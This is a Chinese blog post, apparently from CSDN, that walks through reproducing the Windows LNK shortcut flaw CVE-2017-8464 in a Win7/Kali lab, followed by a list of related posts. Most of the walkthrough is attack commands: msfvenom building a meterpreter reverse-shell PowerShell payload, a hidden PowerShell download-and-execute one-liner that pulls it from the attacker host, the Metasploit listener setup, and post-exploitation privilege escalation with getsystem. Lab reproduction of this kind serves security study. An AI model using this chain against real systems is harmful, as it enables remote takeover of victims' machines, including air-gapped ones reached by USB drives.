震网三代(CVE-2017-8464)

已于 2022-03-31 19:57:09 修改
阅读量2.3k 收藏 8
点赞数 2
分类专栏: 网络安全 CVE漏洞复现 文章标签: 安全 网络安全 tomcat
于 2022-03-31 17:57:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57379855/article/details/123877519
版权

震网三代(CVE-2017-8464)

CVE-2017-8464

说明:
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危
传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

危害:
被攻击机插入存在攻击lnk的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

环境准备

Win7:192.168.202.136

在这里插入图片描述
Kali:192.168.202.133

在这里插入图片描述

利用原理

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒,并且被远控。

漏洞利用

启动MSF
终端内输入:msfconsole
在这里插入图片描述

开始利用:
使用MSF创建一个后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.202.133 lport=4664 -f psh-reflection>/var/www/html/link.ps1

在这里插入图片描述

在kali下开启apache2
service apache2 start
在这里插入图片描述

通过社会学进行快捷方式传播
powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.202.133/link.ps1’);test.ps1”
在这里插入图片描述在这里插入图片描述

回到MSF终端配置监听
use exploit/multi/handler
配置payload
set payload windows/x64/meterpreter/reverse_tcp
options
在这里插入图片描述

设置 LHOST 和 LPORT
set lhost <当前机器ip> 设置 LHOST
set lport <未被占用的端口> 设置 LPORT
最后在 输入 options 查看配置是否生效

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-czJcCMuj-1648719875555)(一、 什么是 CVE-2017-8464:.assets/1641972233527.png)]

执行监听

run 或者 exploit,在靶机上执行快捷方式
稍等片刻获取到meterpreter
在这里插入图片描述

后渗透

进入终端:shell
在这里插入图片描述
查看IP:ip a
在这里插入图片描述

发现有乱码
输入chcp 65001
在这里插入图片描述

退出,提权:getsystem
在这里插入图片描述

half~
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用CVE-2017-8464漏洞制作病毒U盘攻击
RockHan
01-09 2656
利用CVE-2017-8464漏洞制作病毒U盘 漏洞简介 在“行动”中攻击者利用LNK快捷方式漏洞成功入侵了工控系统,并进一步利用漏洞做摆渡攻击,入侵核心工控系统,LNK漏洞危害级别为高危,用户只要是浏览或查看了存 在病毒的LNK文件,不需要用户点击,就会执行入侵者构造好的恶意代码。 病毒U盘制作 使用kali中msfconsole攻击模块生成病毒U盘文件。 1、启动msfconso...
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3276
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
CVE-2017-8464(三代)漏洞分析与复现
dgjkkhcf的博客
07-22 3888
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、络共享等途径触发漏洞,完全控制用户系统,安全风险高危。......
CVE-2017-8464复现
qq_41772873的博客
03-02 1040
前言 CVE-2017-8464又称远程快捷方式漏洞 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用...
CVE-2017-84643.0漏洞分析与复现
weixin_45484297的博客
03-29 2161
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的络攻击所使用来实施攻击,该漏洞也被称为三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
CVE-2017-8464漏洞复现
nicedreem的博客
02-14 128
CVE-2017-8464复现
CVE-2017-8464 分析
weixin_30814319的博客
12-28 848
目录 CVE-2017-8464(stuxnet 3.0) 分析 0xFF 前言 0x00 分析工具 0x01 漏洞复现 1)、生成一个DLL用于测试 2)、构造一个恶意的lnk二进制文件 3)、RUA! ...
两个CVE漏洞复现
qq_44704184的博客
07-14 2255
简单复现两个漏洞
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞,iis服务提权工具。
stuxnet()的详细分析
06-12
stuxnet()的详细分析文档,详细分析了stuxnet的每个阶段。
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
络战武器——(Stuxnet)病毒
06-06 4683
title: 络战武器——(Stuxnet)病毒 date: 2021-06-06 12:00:00 categories: - 络空间 - 络战 tags: - 络攻击 络战武器——(Stuxnet)病毒 事件 2010 年 6 月 17 日,白俄罗斯一家小 公司 VirusBlockAda 的安全研究人员 发现一种能感染可移动存储设备的恶意软 件。2010年7月,“”(Stuxnet)蠕虫攻击事件浮出水面,引发了国际主流安全厂商和安全研究者的全面关注,卡巴斯基、赛门铁克、安.
三代漏洞复现(CVE-2017-8464)
1匹黑马
02-22 1201
文章目录影响版本危害漏洞原理漏洞复现任务环境创建EXP获取靶机权限利用Powershell获取权限修复建议 影响版本 Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 ...
【漏洞公告】CVE-2017-8543:Windows Search远程代码执行漏洞
Gamay的博客
06-14 8387
2017年6月13日,微软官方在例行补丁日发布编号为CVE-2017-8543的漏洞公告,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
Windows Lnk远程代码执行漏洞(CVE-2017-8464)利用测试
weixin_34051201的博客
09-13 732
本文讲的是Windows Lnk远程代码执行漏洞(CVE-2017-8464)利用测试,北京时间6月14日凌晨,微软发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、络共享等途径触发漏洞,完全控制用户系统,安全风险高危。 该漏洞的原理同2010年据称美国和以色列...
cve-2017-8464复现
最新发布
04-28
CVE-2017-8464是一个Windows系统中的漏洞,其根本原因是Windows中存在一个叫做LNK文件的文件格式,在特定情况下LNK文件可以被用来攻击系统。攻击者可以通过操纵LNK文件来让受害者点击恶意文件或站,从而使得攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值